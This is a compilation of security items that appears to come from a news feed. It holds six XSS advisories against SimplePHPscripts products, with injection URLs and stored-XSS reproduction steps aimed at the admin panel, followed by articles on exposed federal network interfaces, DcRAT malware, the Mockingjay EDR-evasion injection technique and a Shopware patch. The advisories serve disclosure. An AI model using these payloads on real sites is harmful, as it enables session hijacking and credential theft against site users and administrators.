News Script Pro version 2.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/news-script-php-pro/                          ││  Vendor   : SimplePHPscripts                                                           ││  Software : News Script Pro is 2.4                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/mn71q"><script>alert(1)</script>p15vr?cat_id=&p=2Path: /preview.phphttps://website/preview.php?id=467&p=2&search=&SysMessage=ahw5l%3Cscript%3Ealert(1)%3C/script%3Eulvrb[-] Done

News Script Pro 2.4 Cross Site Scripting

Funeral Script version 3.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/funeral-script-php/                           ││  Vendor   : SimplePHPscripts                                                           ││  Software : Funeral Script 3.1                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/a8udq"><script>alert(1)</script>zl141?id=11&p=&search=&SysMessage=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=&search=&SysMessage=phl3z%3cscript%3ealert(1)%3c%2fscript%3ea504dPath: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=y26tx%22%3e%3cscript%3ealert(1)%3c%2fscript%3ellgzs&search=&SysMessage=[-] Done

Funeral Script 3.1 Cross Site Scripting

FAQ Script version 2.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/faq-script-php/                               ││  Vendor   : SimplePHPscripts                                                           ││  Software : FAQ Script 2.3                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/hov24"><script>alert(1)</script>mcpji?act=faq&cat_id=1&search=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?act=new&SysMessage=c513c%3cscript%3ealert(1)%3c%2fscript%3eujbsi[-] Done

FAQ Script 2.3 Cross Site Scripting

Event Script version 2.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/event-script-php/                             ││  Vendor   : SimplePHPscripts                                                           ││  Software : Event Script 2.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/ekhfb"><script>alert(1)</script>cg9xj?search=123Path: /preview.phpGET 'message' parameter is vulnerable to RXSShttps://website/preview.php?message=fy3sr<script>alert(1)</script>aqblo[-] Done

Event Script 2.1 Cross Site Scripting

Classified Ads Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/classified-ads-script-php/                    ││  Vendor   : SimplePHPscripts                                                           ││  Software : Classified Ads Script 1.8                                                  ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=14&cat_id=0&p=reioh%22%3e%3cscript%3ealert(1)%3c%2fscript%3eiv1mz&search=Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/x5t6p"><script>alert(1)</script>w5omd?id=14&cat_id=0&p=&search=## Stored XSS-----------------------------------------------POST /classified-ads-script-php/classifiedscript/user.php HTTP/2Content-Disposition: form-data; name="title"<script>alert(1)</script>-----------------------------------------------POST parameter 'title' is vulnerable to XSS## Steps to Reproduce:1. As a [Normal User] Click on [Create Classified Ad] to create a [New Ads] on this Path (https://website/user.php?act=newAds)2. Inject your [XSS Payload] in "Enter Title"3. Save4. XSS Fired on Local User Browser5. When ADMIN check [Classified Ads Entry List] in Administration Panel to check [Waiting Approval Ads] on this Path (https://website/admin.php?act=ads)6. XSS Will Fire and Executed on his Browser [-] Done

Classified Ads Script 1.8 Cross Site Scripting

GuestBook Script version 2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/guestbook-script-php/                         ││  Vendor   : SimplePHPscripts                                                           ││  Software : GuestBook Script 2.2                                                       ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=newPath: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x[-] Done

GuestBook Script 2.2 Cross Site Scripting

By Waqas
The research mainly aimed at examining VPNs, firewalls, access points, routers, and other remote server management appliances used by top government agencies in the United States.
This is a post from HackRead.com Read the original post: Exposed Interfaces in US Federal Networks: A Breach Waiting to Happen

**Cybersecurity researchers at Censys referred to publicly-accessible exposed interfaces as “low-hanging fruit” for cybercriminals, as they can easily gain unauthorized access to crucial assets.**

Researchers at Censys, an attack surface management company, have discovered hundreds of devices linked to federal networks that have remotely accessible management interfaces. These interfaces can allow for the controlling and configuring of federal agency networks through the public internet.

**Shocking Details Emerge about Federal Network Devices**

According to a blog post from the Censys Research Team, published on June 26, an examination of the attack surfaces of approximately fifty sub-organizations within the federal civilian executive branch (FCEB) revealed 13,000 different hosts spread across 100 autonomous systems.

Further probing uncovered that services running on a subset of 1,300 FCEB hosts, accessible through IPv4 addresses, had hundreds of devices with publicly accessible management interfaces. This revelation falls within the scope of CISA’s BOD 23-02 (Binding Operational Directive).

**What is BOD 23-02?**

CISA’s BOD 23-02 helps federal agencies eliminate risks associated with remotely accessible management interfaces. It requires federal civilian agencies to remove certain networked management interfaces from the internet and mandates them to implement Zero Trust Architecture capabilities to enforce access control to internet-exposed interfaces within fourteen days of discovery.

**What are the Dangers of Internet-Exposed Interfaces?**

Researchers at Censys referred to publicly-accessible interfaces as “low-hanging fruit” for cybercriminals, as they can easily gain unauthorized access to crucial assets. CISA notes that threat actors are taking a keen interest in targeting certain classes of devices, especially those supporting network infrastructures, as it helps them evade detection.

After compromising these devices, attackers can obtain full access to the network. Misconfigurations, insufficient or outdated security measures, and unpatched software make devices vulnerable to exploitation. If the device management interface is directly connected to or accessible from a public-facing internet, it will be far more damaging for the organization.

**Which Devices Are Impacted?**

Researchers mainly examined VPNs, firewalls, access points, routers, and other remote server management appliances. They found around 250 different web interfaces for hosts exposing network appliances, all using SSH and TELNET remote protocols.

Most of the impacted devices were Cisco network appliances with a publicly accessible Adaptive Security Device Manager interface, whereas they also discovered enterprise Cradlepoint router interfaces revealing wireless network details. Other impacted products include Fortinet FortiGuard, SonicWall, and other popular firewalls.

A screenshot shared by Censys shows a publicly accessible Cradlepoint router web interface belonging to a Federal Civilian Executive Branch (FCEB) organization.

In addition, researchers observed exposed remote access protocols, including NetBIOS, FTP, SNMP, and SMB, out-of-band remote server management devices like Lantronix SLC console server, physical Barracuda Email Security Gateway appliances, Nessus vulnerability scanning servers, HTTP services that exposed directory listings, managed file transfer protocols such as GoAnywhere, MOVEit, and SolarWinds Serv-U, and over 150 end-of-life software.

Fifteen of the remote access protocols, which already contain multiple known vulnerabilities exploitable by threat actors, were running on FCEB’s exposed hosts. The report highlights the need for federal agencies to be more proactive in safeguarding their digital assets and improving security mechanisms across all systems to make devices CISA’s BOD 23-02 compliant.

**RELATED ARTICLES**

1.  Avast found backdoor in US Federal Agency Network
2.  Fed Agency securing communication for Trump got hacked
3.  SolarWinds Hack – US Blames Russian Intel Agency Hackers
4.  Iranian Hackers Accessed Domain Controller of US Fed Network
5.  US and China Exposed Most Databases Among 308k Found in 2021

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Exposed Interfaces in US Federal Networks: A Breach Waiting to Happen

By Habiba Rashid
DcRAT malware includes a ransomware plugin that encrypts non-system files, rendering them inaccessible without the decryption key, which threat actors will likely hold for ransom.
This is a post from HackRead.com Read the original post: Hackers Hiding DcRAT Malware in Fake OnlyFans Content

**The modus operandi of this campaign involves luring victims with explicit OnlyFans content, specifically targeting users who engage with adult-oriented materials.**

A malicious campaign targeting smartphone users has been uncovered, utilizing fake OnlyFans content to distribute a dangerous Remote Access Trojan (RAT) known as DcRAT malware. The campaign, which has been active since January 2023, poses a significant risk to users’ devices and personal data.

eSentire, a leading cybersecurity firm, has been at the forefront of uncovering this threat. The company’s Threat Response Unit (TRU) identified the presence of DcRAT, a variant of the widely available AsyncRAT, within a consumer services customer’s system. DcRAT is a potent remote access tool with info-stealing and ransomware capabilities.

**OnlyFans Content Used as Lure**

The modus operandi of this campaign involves luring victims with explicit OnlyFans content, specifically targeting users who engage with adult-oriented materials. Victims are enticed to download ZIP files containing a VBScript loader, which they manually execute, believing it will grant them access to premium OnlyFans content. Unbeknownst to them, this action initiates the installation of the DcRAT Trojan, giving hackers remote control over their devices.

DcRAT presents a multifaceted threat to compromised systems. It can perform keylogging, monitor webcams, manipulate files, remotely access devices, and pilfer web browser credentials, cookies, and Discord tokens.

Furthermore, DcRAT malware includes a ransomware plugin that encrypts non-system files, rendering them inaccessible without the decryption key, which threat actors will likely hold for ransom.

The ransomware plugin of the DcRAT malware analyzed by eSentire

**How the Malware is Being Spread**

The precise method of infection remains uncertain, but experts speculate that malicious forum posts, instant messages, malvertising, or search engine optimization techniques may serve as potential attack vectors. This underscores the importance of exercising caution while browsing the internet, avoiding unfamiliar links, and refraining from interacting with suspicious individuals online.

**Protective Measures to Stay Safe**

To mitigate the risks associated with this malware campaign, eSentire’s TRU team recommends several proactive measures. Users are advised to undergo Phishing and Security Awareness Training (PSAT) to identify and report potentially malicious content accurately.

Additionally, it is recommended to restrict the execution of script files, such as .vbs, and configure systems to open script files with trusted applications like Notepad.

Furthermore, maintaining up-to-date antivirus signatures and utilizing Next-Generation Antivirus (NGAV) or Endpoint Detection and Response (EDR) tools can provide an added layer of protection against emerging threats. Users should also ensure their devices are regularly updated, as these updates often include critical security patches.

**The Need for Vigilance and Awareness**

The discovery of this campaign highlights the ever-evolving nature of cyber threats and serves as a reminder that users must remain vigilant to safeguard their personal data. By staying informed and adopting best practices for online safety, individuals can better protect themselves from the growing menace of malware and data breaches.

As the battle between cybercriminals and cybersecurity professionals continues, it is crucial to prioritize proactive measures and maintain a robust security posture in the face of evolving threats.

1.  Terabytes of OnlyFans data being sold on hacking forum
2.  Warning: Fake GitHub Repos Delivering Malware as PoCs
3.  Microsoft Teams Flaw Sends Malware to Employees’ Inboxes
4.  Chinese Malware Targets European Healthcare via USB Drives
5.  Diicot Threat Group Hit SSH Servers with Brute-Force Malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Hackers Hiding DcRAT Malware in Fake OnlyFans Content

By leveraging misconfigured DLLs instead of EDR-monitored APIs, this new technique injects malicious code into running processes, completely evading endpoint security.

Endpoint detection and response (EDR) systems have become increasingly efficient at detecting typical process injection attempts that invoke a combination of application programming interfaces to insert code into the memory space of a running process.

So researchers at Israeli-based Security Joes set out to find another way to due process injection without relying on EDR-monitored APIs. The result is Mockingjay, a novel method for process injection that leverages dynamic link libraries (DLLs) with default read, write, and execute (RWX) permissions to push code into the address space of a running process.

**The Mockingjay Approach**

The approach reduces the likelihood of an endpoint security mechanism detecting a malicious process injection effort and requires a smaller number of steps to achieve, Security Joes said in a report this week. "Our research aimed to discover alternative methods to dynamically execute code within the memory space of Windows processes, without relying on the monitored Windows APIs," the security firm said.

"Our unique approach, which involves leveraging a vulnerable DLL and copying code to the appropriate section, allowed us to inject code without memory allocation, permission setting, or even starting a thread in the targeted process."

Process injection is a technique for manipulating the memory of a process to either add new functionality or modify its behavior. Attackers commonly use the method to hide malicious code and evade detection on compromised systems. Common process injection methods include self-injection where a process that receives the injected payload also executes it; DLL injection where a malicious DLL is loaded into the memory space of a process; and PE injection where a portable executable file is mapped into the memory of a running process.

"Each of these injection techniques requires a set of specific Windows APIs, which generate characteristic patterns that can be leveraged by defenders and security software for detection and mitigation purposes," Security Joes said in its report. For instance, the APIs required for self-injection are VirtualAlloc, LocalAlloc, GlobalAlloc, and Virtual Protect, the company said. Similarly, the APIs used in PE injection are VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Most EDR systems are tuned to monitor commonly used APIs in process injection attacks and can effectively identify malicious activity associated with their use.

**Abusing Vulnerable DLLs**

The strategy Security Joes used in developing Mockingjay was to systematically search for DLLs within the Windows OS that contained a default RWX section. Researchers at the company developed a tool that explored the entire Windows file system to identify DLLs that could serve as potential vehicles for code injection without triggering an EDR alert. The exploration resulted in Security Joes finding a DLL (msys-2.0.dll) with 16KB of RWX space in Visual Studio 2022 Community that they could use for injecting and executing their own code.

"After identifying the vulnerable DLL that contains a default Read-Write-Execute (RWX) section on disk, we conducted several tests to explore two different methods that could leverage this misconfiguration to execute code in memory," Security Joes said.

One method was to directly load the vulnerable DLL into the memory space of a custom application called nightmare.exe that Security Joes developed. Doing that allowed researchers to inject and execute their own shellcode into the memory space of the application without leveraging any Windows APIs. Among other things, the shellcode also removed all EDR hooks without triggering any alerts. "This complete removal of dependency on Windows APIs not only reduces the likelihood of detection but also enhances the effectiveness of the technique," the company said.

Security Joes' second tactic for abusing the RWX section in the DLL was to do process injection in a remote process. To achieve this, they first identified binaries that used mysys-2.0.dll for their operations. Many of these were associated with GNU utilities and other applications that require POSIX emulation. For the proof-of-concept, researchers chose the ssh.exe process in Visual Studio 2022 Community as the target for injecting their code. "It is important to note that in this injection method, there is no need to explicitly create a thread within the target process, as the process automatically executes the injected code," the company explained.

According to Security Joes, the DLL that its researchers used to developed Mockingjay is just one of potentially many others that can similarly be abused for code injection purposes. Addressing the threat requires endpoint security tools that don't just monitor specific APIs and DLLs but also use behavioral analysis and machine learning techniques to identify process injection.

Mockingjay Slips By EDR Tools With Process Injection Technique

Shopware is an open source e-commerce software. The mail validation in the registration process had some flaws, so it was possible to construct different mail addresses, that in the end result in the same address, which is shared by multiple accounts. This issue has been addressed in version 5.7.18 and users are advised to update. There are no known workarounds for this vulnerability.

Next to the usual bug fixes and optimisations, we have also been able to close vulnerabilities at the „low“ threat level.  
Affected are the Shopware versions from 5.1.4 to 5.7.17  
The following vulnerabilities, were fixed with this security update:

*   SW-27070: Dependency configuration file exposed (since 5.6.0 CVE-2023-34098)
*   SW-27102: Improper mail validation (since 5.1.4 CVE-2023-34099)

**Solutions**

**Update the Shopware installation (Recommended)**

We recommend updating to the current version 5.7.18. You can get the update to 5.7.18 regularly via the Auto-Updater or directly via the download overview.

If you can't update your Shopware installation (recommended), you can also secure it using a plugin:

*   Download the Shopware security plugin from the store or alternatively directly from the plugin manager in the backend.
    
*   Install and activate the plugin
    

If the plugin already exists, you can simply update the plugin through the plugin manager to bring it up to date. If problems occur, you can disable individual fixes using the plugin settings.

Please check all important functionalities after installation or update, especially the ordering process.

**Was this article helpful?**

Tag

#ssh